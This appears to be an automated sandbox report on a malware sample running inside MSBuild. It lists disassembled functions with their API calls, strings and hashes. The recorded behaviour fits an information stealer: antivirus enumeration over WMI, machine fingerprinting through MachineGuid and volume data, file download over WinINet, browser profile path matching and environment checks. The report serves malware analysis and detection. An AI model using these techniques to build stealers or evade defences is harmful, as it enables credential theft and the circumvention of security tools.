                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                                                            • String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                                                            • API String ID: 685420537-2776955613
                                                                                                                                                                                                                                                                            • Opcode ID: 5fbc72881901a930d909b08e693eb3415aed348d33cd1dd08cc58bbd85476723
                                                                                                                                                                                                                                                                            • Instruction ID: 771bfa06b1ee6aab49511a194e20b68bd9ee86493e24a2358091a886c33ff084
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5fbc72881901a930d909b08e693eb3415aed348d33cd1dd08cc58bbd85476723
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1415A71B01229ABCB24DB95DC45EEFBB78EF49B50F10411AF615A7290C678AA01CBE4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00413B80 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AF8
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,00000004), ref: 00405B10
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B34
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: HttpOpenRequestA.WININET(00000000,GET,?,00E39E50,00000000,00000000,-00400100,00000000), ref: 00405B6B
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B8F
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C14
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00422019), ref: 00413C2B
                                                                                                                                                                                                                                                                              • Part of subcall function 004116D0: LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00413C57
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00413C6C
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00413C89
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internetlstrcpylstrlen$Open$AllocConnectHttpLocalOptionRequest
                                                                                                                                                                                                                                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                                            • API String ID: 2440237315-1526165396
                                                                                                                                                                                                                                                                            • Opcode ID: 6d3e98a88f886c359271a77fae815b0e1c5059f1360d4e4e151493efacfc2543
                                                                                                                                                                                                                                                                            • Instruction ID: c127ad534209f32346ea4566e2f3d6fae2444d447a8e8f5fff74df097b54c808
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d3e98a88f886c359271a77fae815b0e1c5059f1360d4e4e151493efacfc2543
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F151C330901258DACB10EBA5C9117DDBBA5AF19308F5000BEE905732D2DB7C6F08C7EA
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00410D30 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 133memorystringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410D68
                                                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(00421A29,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410DA1
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DED
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00410DF4
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00410E31
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,00427080), ref: 00410E40
                                                                                                                                                                                                                                                                              • Part of subcall function 00410CD0: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410CE5
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00410E62
                                                                                                                                                                                                                                                                              • Part of subcall function 00411B50: malloc.MSVCRT ref: 00411B61
                                                                                                                                                                                                                                                                              • Part of subcall function 00411B50: strncpy.MSVCRT ref: 00411B71
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00410E90
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                                                                            • String ID: :\$C
                                                                                                                                                                                                                                                                            • API String ID: 2389002695-3309953409
                                                                                                                                                                                                                                                                            • Opcode ID: d6705a00220cc022f61928ee9874d8f35f6da8f4b6566dbd53bd07c02a58f791
                                                                                                                                                                                                                                                                            • Instruction ID: 480affee391e33356010d181296b11b1904528edf9fade7e017b84c509911b2e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6705a00220cc022f61928ee9874d8f35f6da8f4b6566dbd53bd07c02a58f791
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8741C371901218ABDB10EBE4DC05BEEBB79EF08704F10015EFA05B7281EBB85A44C7E5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 004058C0 Relevance: 15.1, APIs: 10, Instructions: 142networkfileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405925
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,0000000B), ref: 00405951
                                                                                                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405976
                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000B), ref: 00405999
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 004059B2
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,000000FF,0041FFE8,00000000,?,?,?,?,?,?,0000000B), ref: 004059D6
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405A00
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000B), ref: 00405A1C
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405A23
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405A2A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 105467990-0
                                                                                                                                                                                                                                                                            • Opcode ID: 293ae950a71a35dd31170524bf55ad8f3fe1ba7934d9239bbdafcff3850940c6
                                                                                                                                                                                                                                                                            • Instruction ID: ad3e8e31fbd1234b42d1b8aa39bbe646f14909c43cf7d3cadb2e212234b9bc59
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 293ae950a71a35dd31170524bf55ad8f3fe1ba7934d9239bbdafcff3850940c6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E51C271910308ABEB10DBA0CC86FEF7779EB05714F504169F601B72C1DB78AA08CBA9
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0040E920 Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 532COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39810,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E980
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39820,?,?,?,?,?,?,?,?,?,?,?,00000000,00421864,000000FF), ref: 0040EA05
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39890,?,?,?,?,?,?,?,?,?,?,?,00000000,00421864,000000FF), ref: 0040EB2C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39810), ref: 0040ECE0
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39820), ref: 0040EDE3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy
                                                                                                                                                                                                                                                                            • String ID: Stable\$ Stable\
                                                                                                                                                                                                                                                                            • API String ID: 3722407311-4033978473
                                                                                                                                                                                                                                                                            • Opcode ID: bda3692e277681d7335d2bab289e7abd920f7fe9e97857ff53baf51a78d4169f
                                                                                                                                                                                                                                                                            • Instruction ID: 797b0d2c89d37aa4bb5ea973c038b2c02b127ec3880a0442df269e7358998569
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bda3692e277681d7335d2bab289e7abd920f7fe9e97857ff53baf51a78d4169f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50325A74900348DFCB14DFA9C581ADEBBF5BF48304F10856EE94AA3791D774AA08CB95
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0040E969 Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 507COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39810,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E980
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39820,?,?,?,?,?,?,?,?,?,?,?,00000000,00421864,000000FF), ref: 0040EA05
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39890,?,?,?,?,?,?,?,?,?,?,?,00000000,00421864,000000FF), ref: 0040EB2C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39810), ref: 0040ECE0
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39820), ref: 0040EDE3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040E2F0: StrCmpCA.SHLWAPI(00000000,Opera GX,00426AD3,00426AD2,?,?), ref: 0040E34D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy
                                                                                                                                                                                                                                                                            • String ID: Stable\$ Stable\
                                                                                                                                                                                                                                                                            • API String ID: 3722407311-4033978473
                                                                                                                                                                                                                                                                            • Opcode ID: 1bdd02703c20214b720293815fe158cec6289543c52e2fa33b3ffe7d7f8e6d03
                                                                                                                                                                                                                                                                            • Instruction ID: 065ccd6fded3c9645b02dfe38afe88cf5481e2341bba9ab26d00f1f73bb39b14
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bdd02703c20214b720293815fe158cec6289543c52e2fa33b3ffe7d7f8e6d03
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86324A74900348DFCB24DFA9C581ADEBBF5BF48304F10856EE94AA3791D774AA08CB95
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00410C30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00410C55
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410C72
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410C94
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00410C9E
                                                                                                                                                                                                                                                                            • CharToOemA.USER32(00000000,?), ref: 00410CB2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CharCloseOpenQueryValuememset
                                                                                                                                                                                                                                                                            • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                            • API String ID: 2391366103-1211650757
                                                                                                                                                                                                                                                                            • Opcode ID: d1a435782dd83d7f550c539121538bf67655ca91605d8f0b0f79fed1bf92e6ca
                                                                                                                                                                                                                                                                            • Instruction ID: 460f4ab23b8a3188437fc1a8912af36b6d87c49434b27b75157095bf63d9280c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1a435782dd83d7f550c539121538bf67655ca91605d8f0b0f79fed1bf92e6ca
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C501D87964421DFBDB24DB90DC46FDA777C9B14700F104195B648A21C1EAB46B848B54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00418490 Relevance: 10.6, APIs: 7, Instructions: 72sleepCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: LoadLibraryA.KERNEL32(kernel32.dll,004184AA), ref: 004185A5
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(00000000,00E2A8A0), ref: 004185C0
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2AA98), ref: 004185ED
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2AAB0), ref: 00418606
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2A960), ref: 0041861E
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2A978), ref: 00418636
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2E4F0), ref: 0041864F
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E33B78), ref: 00418667
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E33918), ref: 0041867F
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2AB58), ref: 00418698
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2AAF8), ref: 004186B0
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2AB70), ref: 004186C8
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2AA08), ref: 004186E1
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E33938), ref: 004186F9
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2A888), ref: 00418711
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2A8B8), ref: 0041872A
                                                                                                                                                                                                                                                                              • Part of subcall function 00401050: strcmp.MSVCRT ref: 0040105C
                                                                                                                                                                                                                                                                              • Part of subcall function 00401050: strcmp.MSVCRT ref: 00401075
                                                                                                                                                                                                                                                                              • Part of subcall function 00401050: ExitProcess.KERNEL32 ref: 00401082
                                                                                                                                                                                                                                                                              • Part of subcall function 00401090: CreateDCA.GDI32(00E2E5B0,00000000,00000000,00000000), ref: 0040109D
                                                                                                                                                                                                                                                                              • Part of subcall function 00401090: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004010A8
                                                                                                                                                                                                                                                                              • Part of subcall function 00401090: ReleaseDC.USER32(00000000,00000000), ref: 004010B1
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: GetProcessHeap.KERNEL32(00000000,00000104,?,00E2E4B0,?,00401074,00E2E4B0,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: HeapAlloc.KERNEL32(00000000,?,00E2E4B0,?,00401074,00E2E4B0,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: GetUserNameA.ADVAPI32(00000000,00E2E4B0), ref: 00410247
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
